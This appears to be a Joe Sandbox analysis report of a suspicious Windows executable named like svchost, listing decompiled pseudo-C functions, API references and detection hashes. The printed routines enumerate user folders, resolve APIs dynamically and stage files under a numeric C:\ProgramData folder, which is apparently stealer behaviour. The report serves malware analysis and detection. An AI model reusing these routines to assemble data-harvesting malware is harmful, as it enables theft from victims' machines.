										CloseHandle( *(_v24 + 0xc));
										 *(_v24 + 0xc) = 0;
										return 0x300;
									}
									return 0x300;
								}
								 *((intOrPtr*)(_v24 + 0x20)) = _a4;
								goto L25;
							}
							return 0x30000;
						}
						_v16 = _a4;
						_t103 = CreateFileA(_v16, 0x40000000, 0, 0, 2, 0x80, 0); // executed
						 *(_v24 + 4) = _t103;
						if( *(_v24 + 4) != 0xffffffff) {
							 *(_v24 + 0x1c) = 1;
							 *(_v24 + 0x10) = 0;
							 *((char*)(_v24 + 8)) = 1;
							return 0;
						}
						 *(_v24 + 4) = 0;
						return 0x200;
					}
					_v12 = _a4;
					 *(_v24 + 4) = _v12;
					 *((char*)(_v24 + 8)) = 0;
					_v8 = SetFilePointer( *(_v24 + 4), 0, 0, 1);
					 *(_v24 + 0x1c) = 0 | _v8 != 0xffffffff;
					if(( *(_v24 + 0x1c) & 0x000000ff) == 0) {
						 *(_v24 + 0x10) = 0;
					} else {
						 *(_v24 + 0x10) = _v8;
					}
					return 0;
				}
			}

0x00b82cb6
0x00b82cc0
0x00000000
0x00b82cfb
0x00b82cff
0x00b82d6c
0x00b82ddb
0x00000000
0x00b82e99
0x00b82de4
0x00b82deb
0x00b82dfb
0x00b82e1f
0x00b82e29
0x00b82e4f
0x00b82e59
0x00b82e79
0x00b82e7c
0x00b82e83
0x00b82e90
0x00000000
0x00b82e93
0x00b82e62
0x00b82e6b
0x00000000
0x00b82e72
0x00000000
0x00b82e2b
0x00b82e03
0x00000000
0x00b82e03
0x00000000
0x00b82ded
0x00b82d71
0x00b82d8a
0x00b82d93
0x00b82d9d
0x00b82db6
0x00b82dbd
0x00b82dc7
0x00000000
0x00b82dcb
0x00b82da2
0x00000000
0x00b82da9
0x00b82d04
0x00b82d0d
0x00b82d13
0x00b82d2a
0x00b82d39
0x00b82d45
0x00b82d55
0x00b82d47
0x00b82d4d
0x00b82d4d
0x00000000
0x00b82d5c

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00B82D24

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: a084bb83e4e067fd3931723176d8ae753cdd6845e1d1532b63ffe914c71da5cd
Instruction ID: 5d67f7fdd4dc23a865902b7c8aa5d262c2569f39739594db9a5a3fd237818625
Opcode Fuzzy Hash: a084bb83e4e067fd3931723176d8ae753cdd6845e1d1532b63ffe914c71da5cd
Instruction Fuzzy Hash: EB6106B4A0020ADFDB14CF54C594BAEB7F1FB04315F248299E9056B391C7B4EE81CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B8D650, Relevance: 7.6, APIs: 5, Instructions: 64
stringCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00B8D650(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v276;
				char _v540;
				signed int _t14;
				void* _t26;
				intOrPtr _t34;
				intOrPtr _t37;
				signed int _t43;

				_t42 = __esi;
				_t41 = __edi;
				_t31 = __ebx;
				_t14 =  *0xba01f4; // 0xac8b3e58
				_v8 = _t14 ^ _t43;
				E00B791C0( &_v540, 0, 0x104);
				E00B791C0( &_v276, 0, 0x104);
				E00B8A380( &_v540, 0x1a); // executed
				 *0xba28c4( &_v540, _a4);
				 *0xba28c4( &_v276,  &_v540);
				_t34 =  *0xba2240; // 0x2d05e60
				_t40 =  &_v276;
				 *0xba28c4( &_v276, _t34);
				_t26 = E00B8A6E0( &_v276); // executed
				if(_t26 != 0) {
					_t37 =  *0xba2570; // 0x2d00560
					if(E00B8C690(__ebx, __edi, __esi, _t37) != 0) {
						_t40 = _a8;
						E00B8D360(__ebx, __edi, __esi, 0xb9945d,  &_v540, _a8);
					}
					_t26 = E00B8C650();
				}
				return E00B74354(_t26, _t31, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x00b8d650
0x00b8d650
0x00b8d650
0x00b8d659
0x00b8d660
0x00b8d671
0x00b8d687
0x00b8d698
0x00b8d6ab
0x00b8d6bf
0x00b8d6c5
0x00b8d6cc
0x00b8d6d3
0x00b8d6e0
0x00b8d6ea
0x00b8d6ec
0x00b8d6fd
0x00b8d6ff
0x00b8d70f
0x00b8d714
0x00b8d717
0x00b8d717
0x00b8d729

APIs

_memset.LIBCMT ref: 00B8D671
_memset.LIBCMT ref: 00B8D687

Part of subcall function 00B8A380: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00B8A39D

lstrcat.KERNEL32(?,?), ref: 00B8D6AB
lstrcat.KERNEL32(?,?), ref: 00B8D6BF
lstrcat.KERNEL32(?,02D05E60), ref: 00B8D6D3

Part of subcall function 00B8A6E0: GetFileAttributesA.KERNEL32(?), ref: 00B8A6EA

Part of subcall function 00B8C690: __wgetenv.LIBCMT ref: 00B8C6A6
Part of subcall function 00B8C690: LoadLibraryA.KERNEL32(02D014D8), ref: 00B8C708
Part of subcall function 00B8C690: GetProcAddress.KERNEL32(00000000,02D059C8), ref: 00B8C72D
Part of subcall function 00B8C690: GetProcAddress.KERNEL32(00000000,02D05968), ref: 00B8C746
Part of subcall function 00B8C690: GetProcAddress.KERNEL32(00000000,02D05FC0), ref: 00B8C75E
Part of subcall function 00B8C690: GetProcAddress.KERNEL32(00000000,02D05980), ref: 00B8C776
Part of subcall function 00B8C690: GetProcAddress.KERNEL32(00000000,02D061A0), ref: 00B8C78F
Part of subcall function 00B8C690: GetProcAddress.KERNEL32(00000000,02D05998), ref: 00B8C7A7

Part of subcall function 00B8D360: wsprintfA.USER32 ref: 00B8D385
Part of subcall function 00B8D360: FindFirstFileA.KERNEL32(?,?), ref: 00B8D39C

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: AddressProc$lstrcat$File_memset$AttributesFindFirstFolderLibraryLoadPath__wgetenvwsprintf
String ID:
API String ID: 1612030115-0
Opcode ID: 53c2ed5ce192a9e7368c91e99e06c2a4dc836945938548037aa1af56a5e37563
Instruction ID: 4b85aed5926d8a1939d54b9878eb6980e0a827448bd4841c3fb21afe4246f9c7
Opcode Fuzzy Hash: 53c2ed5ce192a9e7368c91e99e06c2a4dc836945938548037aa1af56a5e37563
Instruction Fuzzy Hash: 5A11B7B6D4020CA7DB14FBA0EC87FDA73B8AB14704F0445D9BA19971D1FE749A84CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B8AFE0, Relevance: 7.5, APIs: 5, Instructions: 46
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00B8AFE0(intOrPtr __ebx, CHAR* __edx, intOrPtr __edi, intOrPtr __esi) {
				signed int _v8;
				struct _TIME_ZONE_INFORMATION _v188;
				void* _v192;
				long _v196;
				signed int _t17;
				long _t23;
				CHAR* _t29;
				intOrPtr _t31;
				CHAR* _t36;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;

				_t39 = __esi;
				_t38 = __edi;
				_t36 = __edx;
				_t31 = __ebx;
				_t17 =  *0xba01f4; // 0xac8b3e58
				_v8 = _t17 ^ _t40;
				_v192 = HeapAlloc(GetProcessHeap(), 0, 0x104);
				_v188.Bias = 0;
				E00B791C0( &(_v188.StandardName), 0, 0xa8);
				_t23 = GetTimeZoneInformation( &_v188); // executed
				_v196 = _t23;
				if(_v196 != 0xffffffff) {
					asm("cdq");
					_t36 =  *0xba24cc; // 0x2d06860
					wsprintfA(_v192, _t36,  ~(_v188.Bias) / 0x3c);
					_t29 = _v192;
				} else {
					_t29 = _v192;
				}
				return E00B74354(_t29, _t31, _v8 ^ _t40, _t36, _t38, _t39);
			}

0x00b8afe0
0x00b8afe0
0x00b8afe0
0x00b8afe0
0x00b8afe9
0x00b8aff0
0x00b8b007
0x00b8b00d
0x00b8b025
0x00b8b034
0x00b8b03a
0x00b8b047
0x00b8b059
0x00b8b062
0x00b8b070
0x00b8b079
0x00b8b049
0x00b8b049
0x00b8b049
0x00b8b08c

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B8AFFA
HeapAlloc.KERNEL32(00000000), ref: 00B8B001
_memset.LIBCMT ref: 00B8B025
GetTimeZoneInformation.KERNEL32(00000000), ref: 00B8B034
wsprintfA.USER32 ref: 00B8B070

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: Heap$AllocInformationProcessTimeZone_memsetwsprintf
String ID:
API String ID: 3962126076-0
Opcode ID: 320c94362612e1c099a823918bdbcaab01f5eaab93b1a7d193343db4a9a4aae6
Instruction ID: 397fcce40f1fb3977f22109aafbaf00d5504cd049e239250bf46221efa69cb09
Opcode Fuzzy Hash: 320c94362612e1c099a823918bdbcaab01f5eaab93b1a7d193343db4a9a4aae6
Instruction Fuzzy Hash: 6D111E70A00218DBEB54DB68DC4AF99B3B9EB09301F0081D9E91DA7291DB749E88CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00B91620, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00B91620(intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _t36;

				_v12 = __ecx;
				E00B791C0(_v12, 0, 0x148);
				 *((intOrPtr*)(_v12 + 0xc)) = _a4;
				E00B7512D(_v12 + 0x10, 0x14, "1BEF0A57BE110FD467A");
				 *((intOrPtr*)(_v12 + 4)) = 0x7a120;
				_push( *((intOrPtr*)(_v12 + 4))); // executed
				_t36 = E00B74349(__edi, __esi, _v12 + 0x10); // executed
				_v8 = _t36;
				 *_v12 = _v8;
				E00B791C0( *_v12, 0,  *((intOrPtr*)(_v12 + 4)));
				 *((intOrPtr*)(_v12 + 0x24)) = _a8;
				 *((intOrPtr*)(_v12 + 0x38)) = _a12;
				 *((intOrPtr*)(_v12 + 0x3c)) = _a16;
				 *((intOrPtr*)(_v12 + 0x40)) = _a20;
				return _v12;
			}

0x00b91626
0x00b91634
0x00b91642
0x00b91653
0x00b9165e
0x00b9166b
0x00b9166c
0x00b91674
0x00b9167d
0x00b9168e
0x00b9169c
0x00b916a5
0x00b916ae
0x00b916b7
0x00b916c0

APIs

_memset.LIBCMT ref: 00B91634
_strcpy_s.LIBCMT ref: 00B91653
_memset.LIBCMT ref: 00B9168E

Strings

1BEF0A57BE110FD467A, xrefs: 00B91645

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: _memset$_strcpy_s
String ID: 1BEF0A57BE110FD467A
API String ID: 1261871945-2910601657
Opcode ID: 3116398006c011e6d528e8808ede5b5e22473ef35c5d0f84c93fe58a3d60fdfe
Instruction ID: 4de71d4fd69d3c3035b6b7a5b1142bc28c5439c91c67a8dc39fbb40745f3b24a
Opcode Fuzzy Hash: 3116398006c011e6d528e8808ede5b5e22473ef35c5d0f84c93fe58a3d60fdfe
Instruction Fuzzy Hash: CD21CCB9E00208AFDB04DF94D485D9EBBB5FF88314F108198E948AB351E771EA51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B74E60, Relevance: 6.0, APIs: 4, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E00B74E60(void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v0;
				char* _v8;
				char _v20;
				void* _t26;
				signed int _t27;
				signed int _t30;
				intOrPtr* _t31;
				signed int _t33;
				void* _t34;
				intOrPtr* _t35;
				signed int _t41;
				signed int _t46;
				signed int _t52;
				signed int _t53;
				void* _t56;
				signed int _t58;
				signed int _t59;
				void* _t61;
				signed int _t64;
				void* _t65;
				signed int _t67;
				signed int _t68;
				signed int _t70;

				_t65 = __esi;
				_t61 = __edi;
				while(1) {
					_t26 = E00B7537B(_t56, _t61, _t65, _a4); // executed
					if(_t26 != 0) {
						break;
					}
					_t27 = E00B78F17(_t26, _a4);
					__eflags = _t27;
					if(_t27 == 0) {
						__eflags =  *0xba10ec & 0x00000001;
						if(( *0xba10ec & 0x00000001) == 0) {
							 *0xba10ec =  *0xba10ec | 0x00000001;
							__eflags =  *0xba10ec;
							_push(1);
							_v8 = "bad allocation";
							E00B7465A(0xba10e0,  &_v8);
							 *0xba10e0 = 0xb97240;
							E00B74DED( *0xba10ec, 0xb9690f);
						}
						_t46 =  &_v20;
						E00B74770(_t46, 0xba10e0);
						_v20 = 0xb97240;
						_t30 = E00B77185( &_v20, 0xb9e190);
						asm("int3");
						_push(0xb97240);
						_t67 = _t46;
						_t41 = 0;
						__eflags = _t67;
						if(__eflags != 0) {
							_push(0xba10e0);
							__eflags = _v0;
							if(__eflags > 0) {
								__eflags = _a8;
								 *_t67 = 0;
								__eflags = _v0 - (0 | _a8 != 0x00000000) + 1;
								if(__eflags > 0) {
									__eflags = _a4 + 0xfffffffe - 0x22;
									if(__eflags > 0) {
										goto L10;
									} else {
										_t52 = _t67;
										__eflags = _a8;
										if(_a8 != 0) {
											_t41 = 1;
											__eflags = 1;
											 *_t67 = 0x2d;
											_t52 = _t67 + 1;
											_t30 =  ~_t30;
										}
										_t64 = _t52;
										do {
											_t20 = _t30 % _a4;
											_t30 = _t30 / _a4;
											_t58 = _t20;
											__eflags = _t58 - 9;
											if(_t58 <= 9) {
												_t59 = _t58 + 0x30;
												__eflags = _t59;
											} else {
												_t59 = _t58 + 0x57;
											}
											 *_t52 = _t59;
											_t52 = _t52 + 1;
											_t41 = _t41 + 1;
											__eflags = _t30;
											if(_t30 != 0) {
												goto L22;
											}
											break;
											L22:
											__eflags = _t41 - _v0;
										} while (_t41 < _v0);
										__eflags = _t41 - _v0;
										if(__eflags < 0) {
											 *_t52 = 0;
											_t53 = _t52 - 1;
											__eflags = _t53;
											do {
												_t34 =  *_t53;
												 *_t53 =  *_t64;
												_t53 = _t53 - 1;
												 *_t64 = _t34;
												_t64 = _t64 + 1;
												__eflags = _t64 - _t53;
											} while (_t64 < _t53);
											_t33 = 0;
											__eflags = 0;
										} else {
											 *_t67 = 0;
											goto L13;
										}
									}
								} else {
									L13:
									_t31 = E00B75A49(__eflags);
									_push(0x22);
									goto L11;
								}
							} else {
								L10:
								_t31 = E00B75A49(__eflags);
								_push(0x16);
								L11:
								_pop(_t68);
								 *_t31 = _t68;
								E00B77461();
								_t33 = _t68;
							}
						} else {
							_t35 = E00B75A49(__eflags);
							_t70 = 0x16;
							 *_t35 = _t70;
							E00B77461();
							_t33 = _t70;
						}
						return _t33;
					} else {
						continue;
					}
					L30:
				}
				return _t26;
				goto L30;
			}

0x00b74e60
0x00b74e60
0x00b74e77
0x00b74e7a
0x00b74e82
0x00000000
0x00000000
0x00b74e6d
0x00b74e73
0x00b74e75
0x00b74e86
0x00b74e97
0x00b74e99
0x00b74e99
0x00b74ea0
0x00b74ea8
0x00b74eaf
0x00b74eb9
0x00b74ebf
0x00b74ec4
0x00b74ec6
0x00b74ec9
0x00b74ed7
0x00b74eda
0x00b74edf
0x00b74ee6
0x00b74ee7
0x00b74ee9
0x00b74eeb
0x00b74eed
0x00b74f05
0x00b74f06
0x00b74f09
0x00b74f20
0x00b74f23
0x00b74f29
0x00b74f2c
0x00b74f3d
0x00b74f40
0x00000000
0x00b74f42
0x00b74f42
0x00b74f44
0x00b74f47
0x00b74f4b
0x00b74f4b
0x00b74f4c
0x00b74f4f
0x00b74f52
0x00b74f52
0x00b74f54
0x00b74f56
0x00b74f58
0x00b74f58
0x00b74f58
0x00b74f5b
0x00b74f5e
0x00b74f65
0x00b74f65
0x00b74f60
0x00b74f60
0x00b74f60
0x00b74f68
0x00b74f6a
0x00b74f6b
0x00b74f6c
0x00b74f6e
0x00000000
0x00000000
0x00000000
0x00b74f70
0x00b74f70
0x00b74f70
0x00b74f75
0x00b74f78
0x00b74f7f
0x00b74f82
0x00b74f82
0x00b74f83
0x00b74f85
0x00b74f87
0x00b74f89
0x00b74f8a
0x00b74f8c
0x00b74f8d
0x00b74f8d
0x00b74f91
0x00b74f91
0x00b74f7a
0x00b74f7a
0x00000000
0x00b74f7a
0x00b74f78
0x00b74f2e
0x00b74f2e
0x00b74f2e
0x00b74f33
0x00000000
0x00b74f33
0x00b74f0b
0x00b74f0b
0x00b74f0b
0x00b74f10
0x00b74f12
0x00b74f12
0x00b74f13
0x00b74f15
0x00b74f1a
0x00b74f1a
0x00b74eef
0x00b74eef
0x00b74ef6
0x00b74ef7
0x00b74ef9
0x00b74efe
0x00b74efe
0x00b74f97
0x00000000
0x00000000
0x00000000
0x00000000
0x00b74e75
0x00b74e85
0x00000000

APIs

_malloc.LIBCMT ref: 00B74E7A

Part of subcall function 00B7537B: __FF_MSGBANNER.LIBCMT ref: 00B75394
Part of subcall function 00B7537B: __NMSG_WRITE.LIBCMT ref: 00B7539B
Part of subcall function 00B7537B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00B746A4,00000001,00000000,?,?,?,00B74702,?), ref: 00B753C0

std::exception::exception.LIBCMT ref: 00B74EAF
std::exception::exception.LIBCMT ref: 00B74EC9
__CxxThrowException@8.LIBCMT ref: 00B74EDA

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: ce2ddc14eb0cd641abcb8583660ec44eab84ed5d1e45393645b1334c6620c0ce
Instruction ID: 3f9d9c92387a98efa9e13a403e18a8eae3a1be6ab1620c417cb606785f5a7060
Opcode Fuzzy Hash: ce2ddc14eb0cd641abcb8583660ec44eab84ed5d1e45393645b1334c6620c0ce
Instruction Fuzzy Hash: 65F02D35904149AACF14EB65DC12A6D37ECFB42361F10C4E5F439A60E1DFB08D408754

Uniqueness

Uniqueness Score: -1.00%

Function 00B94F00, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 269
stringCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00B94F00(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _t5;
				intOrPtr _t7;
				intOrPtr _t9;
				intOrPtr _t11;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr _t33;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr _t39;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				void* _t68;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				intOrPtr _t84;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr _t88;
				intOrPtr _t89;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t101;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t105;
				intOrPtr _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t112;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				intOrPtr _t131;
				intOrPtr _t132;
				intOrPtr _t133;
				void* _t170;

				_t135 = __esi;
				_t134 = __edi;
				_t69 = __ebx;
				E00B791C0("C:\\ProgramData\\216363876181815", 0, 0x104);
				 *0xba28c4("C:\\ProgramData\\216363876181815", _a4);
				_t70 =  *0xba2190; // 0x2d07dc0
				_t102 =  *0xba211c; // 0x2d07df0
				_t5 =  *0xba211c; // 0x2d07df0
				E00B94E20(__ebx, __edi, __esi, _t170, _t5, _t102, _t70); // executed
				_t71 =  *0xba22e4; // 0x2d07dd8
				_t103 =  *0xba2680; // 0x2d07eb0
				_t7 =  *0xba2680; // 0x2d07eb0
				E00B94E20(__ebx, __edi, __esi, _t170, _t7, _t103, _t71); // executed
				_t72 =  *0xba25e8; // 0x2d07f28
				_t104 =  *0xba2610; // 0x2d07700
				_t9 =  *0xba2620; // 0x2d07e08
				E00B94E20(_t69, _t134, _t135, _t170, _t9, _t104, _t72); // executed
				_t73 =  *0xba25e8; // 0x2d07f28
				_t105 =  *0xba2290; // 0x2d06600
				_t11 =  *0xba2344; // 0x2d07ec8
				E00B94E20(_t69, _t134, _t135, _t170, _t11, _t105, _t73); // executed
				_t74 =  *0xba25e8; // 0x2d07f28
				_t106 =  *0xba2328; // 0x2d063a8
				_t13 =  *0xba2194; // 0x2d07e68
				E00B94E20(_t69, _t134, _t135, _t170, _t13, _t106, _t74); // executed
				_t75 =  *0xba263c; // 0x2d077a0
				_t107 =  *0xba2144; // 0x2d07e20
				_t15 =  *0xba2144; // 0x2d07e20
				E00B94E20(_t69, _t134, _t135, _t170, _t15, _t107, _t75); // executed
				_t76 =  *0xba2384; // 0x2d078a0
				_t108 =  *0xba2144; // 0x2d07e20
				_t17 =  *0xba2144; // 0x2d07e20
				E00B94E20(_t69, _t134, _t135, _t170, _t17, _t108, _t76); // executed
				_t77 =  *0xba2464; // 0x2d07f40
				_t109 =  *0xba2478; // 0x2d063d0
				_t19 =  *0xba2144; // 0x2d07e20
				E00B94E20(_t69, _t134, _t135, _t170, _t19, _t109, _t77); // executed
				_t78 =  *0xba25f8; // 0x2d08000
				_t110 =  *0xba2478; // 0x2d063d0
				_t21 =  *0xba2144; // 0x2d07e20
				E00B94E20(_t69, _t134, _t135, _t170, _t21, _t110, _t78); // executed
				_t79 =  *0xba2614; // 0x2d07f58
				_t111 =  *0xba2478; // 0x2d063d0
				_t23 =  *0xba2144; // 0x2d07e20
				E00B94E20(_t69, _t134, _t135, _t170, _t23, _t111, _t79); // executed
				_t80 =  *0xba24e8; // 0x2d078c0
				_t112 =  *0xba2430; // 0x2d07f10
				_t25 =  *0xba2430; // 0x2d07f10
				E00B94E20(_t69, _t134, _t135, _t170, _t25, _t112, _t80); // executed
				_t81 =  *0xba2190; // 0x2d07dc0
				_t113 =  *0xba26a4; // 0x2d07e38
				_t27 =  *0xba26a4; // 0x2d07e38
				E00B94E20(_t69, _t134, _t135, _t170, _t27, _t113, _t81); // executed
				_t82 =  *0xba2190; // 0x2d07dc0
				_t114 =  *0xba2630; // 0x2d08030
				_t29 =  *0xba2630; // 0x2d08030
				E00B94E20(_t69, _t134, _t135, _t170, _t29, _t114, _t82); // executed
				_t83 =  *0xba2190; // 0x2d07dc0
				_t115 =  *0xba23e0; // 0x2d08048
				_t31 =  *0xba23e0; // 0x2d08048
				E00B94E20(_t69, _t134, _t135, _t170, _t31, _t115, _t83); // executed
				_t84 =  *0xba2190; // 0x2d07dc0
				_t116 =  *0xba269c; // 0x2d07fd0
				_t33 =  *0xba269c; // 0x2d07fd0
				E00B94E20(_t69, _t134, _t135, _t170, _t33, _t116, _t84); // executed
				_t85 =  *0xba2190; // 0x2d07dc0
				_t117 =  *0xba2510; // 0x2d07f70
				_t35 =  *0xba2510; // 0x2d07f70
				E00B94E20(_t69, _t134, _t135, _t170, _t35, _t117, _t85); // executed
				_t86 =  *0xba2190; // 0x2d07dc0
				_t118 =  *0xba2484; // 0x2d07e80
				_t37 =  *0xba2484; // 0x2d07e80
				E00B94E20(_t69, _t134, _t135, _t170, _t37, _t118, _t86); // executed
				_t87 =  *0xba2190; // 0x2d07dc0
				_t119 =  *0xba2698; // 0x2d07f88
				_t39 =  *0xba2698; // 0x2d07f88
				E00B94E20(_t69, _t134, _t135, _t170, _t39, _t119, _t87); // executed
				_t88 =  *0xba2190; // 0x2d07dc0
				_t120 =  *0xba2518; // 0x2d08060
				_t41 =  *0xba2518; // 0x2d08060
				E00B94E20(_t69, _t134, _t135, _t170, _t41, _t120, _t88); // executed
				_t89 =  *0xba2190; // 0x2d07dc0
				_t121 =  *0xba234c; // 0x2d07fa0
				_t43 =  *0xba234c; // 0x2d07fa0
				E00B94E20(_t69, _t134, _t135, _t170, _t43, _t121, _t89); // executed
				_t90 =  *0xba2190; // 0x2d07dc0
				_t122 =  *0xba2238; // 0x2d07e98
				_t45 =  *0xba2238; // 0x2d07e98
				E00B94E20(_t69, _t134, _t135, _t170, _t45, _t122, _t90); // executed
				_t91 =  *0xba2190; // 0x2d07dc0
				_t123 =  *0xba216c; // 0x2d07780
				_t47 =  *0xba2414; // 0x2d07ee0
				E00B94E20(_t69, _t134, _t135, _t170, _t47, _t123, _t91); // executed
				_t92 =  *0xba2190; // 0x2d07dc0
				_t124 =  *0xba268c; // 0x2d07860
				_t49 =  *0xba268c; // 0x2d07860
				E00B94E20(_t69, _t134, _t135, _t170, _t49, _t124, _t92); // executed
				_t93 =  *0xba2190; // 0x2d07dc0
				_t125 =  *0xba2654; // 0x2d07fb8
				_t51 =  *0xba2654; // 0x2d07fb8
				E00B94E20(_t69, _t134, _t135, _t170, _t51, _t125, _t93); // executed
				_t94 =  *0xba2190; // 0x2d07dc0
				_t126 =  *0xba20c0; // 0x2d07da8
				_t53 =  *0xba20c0; // 0x2d07da8
				E00B94E20(_t69, _t134, _t135, _t170, _t53, _t126, _t94); // executed
				_t95 =  *0xba2190; // 0x2d07dc0
				_t127 =  *0xba21ac; // 0x2d07fe8
				_t55 =  *0xba21ac; // 0x2d07fe8
				E00B94E20(_t69, _t134, _t135, _t170, _t55, _t127, _t95); // executed
				_t96 =  *0xba2190; // 0x2d07dc0
				_t128 =  *0xba2530; // 0x2d08018
				_t57 =  *0xba2530; // 0x2d08018
				E00B94E20(_t69, _t134, _t135, _t170, _t57, _t128, _t96); // executed
				_t97 =  *0xba2190; // 0x2d07dc0
				_t129 =  *0xba2380; // 0x2d07d78
				_t59 =  *0xba2380; // 0x2d07d78
				E00B94E20(_t69, _t134, _t135, _t170, _t59, _t129, _t97); // executed
				_t98 =  *0xba2190; // 0x2d07dc0
				_t130 =  *0xba209c; // 0x2d07d90
				_t61 =  *0xba209c; // 0x2d07d90
				E00B94E20(_t69, _t134, _t135, _t170, _t61, _t130, _t98); // executed
				_t99 =  *0xba2190; // 0x2d07dc0
				_t131 =  *0xba20cc; // 0x2d08138
				_t63 =  *0xba20cc; // 0x2d08138
				E00B94E20(_t69, _t134, _t135, _t170, _t63, _t131, _t99); // executed
